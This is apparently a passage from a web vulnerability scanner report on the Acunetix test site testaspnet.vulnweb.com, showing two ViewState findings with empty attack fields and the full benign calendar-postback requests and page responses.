</TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8352&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBA%2FAEKxdoIZGRklRfK4b5l2%2BAFVC2KdKE5uXdfaeQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL8poT4BQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA2Q4KFL8MO0i593VbFOOlTywM882
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:29 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBA/AEKxdoIZGRklRfK4b5l2+AFVC2KdKE5uXdfaeQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL8poT4BQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA2Q4KFL8MO0i593VbFOOlTywM882" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:White" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8340&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBABwWcu9oIZGRk4mSqKRIND%2FP6yec%2BzLPNb0pG%2B5Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKs8a6eDwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2BvYXwXe7fispYS4SKQyywy0qmXa
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:38 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBABwWcu9oIZGRk4mSqKRIND/P6yec+zLPNb0pG+5Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKs8a6eDwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+vYXwXe7fispYS4SKQyywy0qmXa" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:White" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 